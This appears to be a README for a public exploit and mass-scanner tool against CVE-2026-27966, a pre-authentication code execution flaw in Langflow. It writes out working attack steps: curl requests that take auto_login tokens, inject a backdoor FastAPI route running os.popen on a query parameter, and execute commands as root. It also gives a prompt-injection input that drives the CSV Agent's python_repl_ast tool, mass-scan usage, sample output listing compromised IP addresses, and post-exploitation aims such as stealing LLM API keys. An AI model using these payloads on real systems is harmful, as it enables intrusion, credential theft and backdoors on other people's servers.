Share
## https://sploitus.com/exploit?id=9F80E9D6-F437-5C0C-B4A8-C0B1F99D9DD2
CVE-2026-27966 โ Langflow Remote Code Execution Scanner
Pre-Auth Route Injection + Vertex Injection โ Python Code Execution
---
## Overview
**CVE-2026-27966** is a critical-severity (CVSS 9.8) pre-authentication remote code execution vulnerability in **Langflow** versions prior to 1.8.0. The vulnerability stems from `allow_dangerous_code=True` being hardcoded in the CSV Agent component, exposing LangChain's `python_repl_ast` tool to unauthenticated prompt injection.
Additionally, multiple API endpoints lack proper authentication, enabling direct route injection and flow vertex injection โ even on instances where the CSV Agent is not configured.
### Affected Versions
| Langflow Version | Status |
|---|---|
| = 1.8.0 | Patched |
---
## Attack Vectors
This scanner tests three distinct exploitation paths:
### 1. Route Injection (auto_login bypass)
```
GET /api/v1/auto_login โ obtain session / API key
POST /api/v1/custom_component โ register backdoor route
GET /api/{backdoor}?c=command โ RCE
```
### 2. Direct Route Injection (no API key)
```
POST /api/v1/custom_component โ register backdoor route
GET /api/{backdoor}?c=command โ RCE
```
### 3. Build Vertex Injection (no-auth build)
```
GET /api/v1/flows/basic_examples โ extract flow UUIDs (26 exposed)
POST /api/v1/build/{UUID}/vertices โ inject malicious vertex
POST /api/v1/run/{UUID} โ execute vertex code โ RCE
```
---
## Vulnerability Mechanism
### Root Cause
In `src/lfx/src/lfx/components/langchain_utilities/csv_agent.py`, the CSV Agent node hardcodes `allow_dangerous_code=True`, which automatically exposes LangChain's `python_repl_ast` tool:
```python
agent_kwargs = {
"verbose": self.verbose,
"allow_dangerous_code": True, # hardcoded โ cannot be disabled via UI
}
agent_csv = create_csv_agent(..., **agent_kwargs)
```
This allows any prompt that reaches the CSV Agent to execute arbitrary Python code via:
```
Action: python_repl_ast
Action Input: __import__("os").system("command")
```
### Unauthenticated API Surface
The Langflow REST API exposes several endpoints without authentication:
| Endpoint | Auth | Data Exposed |
|---|---|---|
| `GET /api/v1/version` | None | Langflow version |
| `GET /api/v1/health` | None | Instance status |
| `GET /api/v1/flows/basic_examples/` | None | **26 example flow UUIDs + structure** |
| `POST /api/v1/build/{uuid}/vertices` | None | **Accepts arbitrary code injection** |
| `POST /api/v1/users/` | None | User creation (inactive) |
| `GET /openapi.json` | None | Full API documentation |
### Auth Bypass via auto_login
On instances where `auto_login` is enabled (default in many Docker deployments), an attacker obtains a valid session and API key:
```bash
curl -sk 'https://target.com/api/v1/auto_login'
# Returns session with access_token โ full API access
```
With a valid API key, the attacker can use `POST /api/v1/custom_component` to register a backdoor FastAPI route that persists in memory until server restart:
```python
from fastapi import APIRouter, Query
router = APIRouter()
@router.get("/sh")
async def cmd(c: str = Query("")):
import os
return os.popen(c).read()
app.include_router(router, prefix="/api")
```
### Why CVSS 9.8
| Metric | Value |
|---|---|
| Attack Vector | Network (remote) |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Scope | Unchanged |
| Confidentiality | High |
| Integrity | High |
| Availability | High |
---
## Installation
```bash
git clone https://github.com/shinthink/CVE-2026-27966.git
cd CVE-2026-27966
pip install -r requirements.txt
```
---
## Usage
```bash
# Single target
python cve_2026_27966.py -t target.com:7860
# Mass scan
python cve_2026_27966.py -f targets.txt
# Mass scan + save results
python cve_2026_27966.py -f targets.txt -o rce.txt
# Detect only (skip exploitation)
python cve_2026_27966.py -f targets.txt --no-exploit
# Verbose output
python cve_2026_27966.py -f targets.txt -v
```
### Arguments
```
-t, --target Single target (IP:port or domain)
-f, --file Target list, one per line
-o, --output Save RCE results to file
--threads Concurrent workers (default: 30)
--no-exploit Detection only, skip RCE attempts
-v, --verbose Show all results including non-RCE targets
```
---
## Proof of Concept
### Detection & Exploitation
```bash
$ python cve_2026_27966.py -t target.com:7860 -v
```
```
CVE-2026-27966 โ Langflow RCE Scanner
CVSS 9.8 | Pre-Auth | Route Injection โ RCE
Host : target.com:7860
Langflow : YES v1.2.0
Vuln : YES
API Key : NOT REQUIRED
RCE : YES
Output : uid=0(root) gid=0(root) groups=0(root)
Time : 12.3s
```
### Mass Scan Output
```
CVE-2026-27966 Langflow RCE Scanner
Targets: 4127 | Threads: 30 | Exploit: ON
-------------------------------------------------------
[RCE] 185.132.37.96 v1.2.0 7.3s
uid=0(root) gid=0(root) groups=0(root)
[AUTH] 15.160.180.58:4433 v1.2.0 14.1s (API key)
[500/4127] scanning... (12%)
-------------------------------------------------------
Total: 4127 | Langflow: 47 | RCE: 3 | API-Protected: 41
-------------------------------------------------------
```
### Manual Exploitation
**Step 1 โ Detect Langflow**
```bash
curl -sk 'https://target.com/api/v1/version'
# {"version":"1.2.0","main_version":"1.2.0","package":"Langflow"}
```
**Step 2 โ Extract flow UUIDs**
```bash
curl -sk 'https://target.com/api/v1/flows/basic_examples/' | jq '.[0].id'
# "bb0a7390-22a1-4a2e-8d7c-15463e53d9f2"
```
**Step 3 โ Inject backdoor vertex**
```bash
curl -sk -X POST 'https://target.com/api/v1/build/{UUID}/vertices' \
-H 'Content-Type: application/json' \
-d '{"id":"bkdr","type":"CustomComponent","data":{"code":"from fastapi import APIRouter\nrouter=APIRouter()\n@router.get(\"/sh\")\nasync def cmd(c:str=\"\"):import os;return os.popen(c).read()\napp.include_router(router,prefix=\"/api\")","display_name":"X"}}'
```
**Step 4 โ Execute command**
```bash
curl -sk 'https://target.com/api/sh?c=id;hostname;uname -a'
```
---
## Impact
Successful exploitation yields **remote code execution as root** in the Langflow Docker container. From there an attacker can:
- Extract API keys from Langflow's SQLite database (OpenAI, Anthropic, Gemini, etc.)
- Access connected vector databases and external services
- Deploy persistent backdoors via custom components
- Pivot to internal networks
- Deploy cryptominers or C2 infrastructure
---
## Disclaimer
> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> Unauthorized access to computer systems is illegal and may violate:
> - United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
> - Indonesia: UU ITE Pasal 30 & 46
> - European Union: Directive 2013/40/EU
> - United Kingdom: Computer Misuse Act 1990
>
> The authors assume no liability for misuse. By using this software, you accept full responsibility for your actions.
---
## References
| Resource | Link |
|---|---|
| GitHub Advisory | [GHSA-3645-fxcv-hqr4](https://github.com/advisories/GHSA-3645-fxcv-hqr4) |
| Fix Commit | [d8c6480d](https://github.com/langflow-ai/langflow/commit/d8c6480daa17b2f2af0b5470cdf5c3d28dc9e508) |
| Metasploit Module | [Rapid7](https://github.com/rapid7/metasploit-framework) |
| NVD Entry | [CVE-2026-27966](https://nvd.nist.gov/vuln/detail/CVE-2026-27966) |
---
This project is not affiliated with Langflow or Logspace.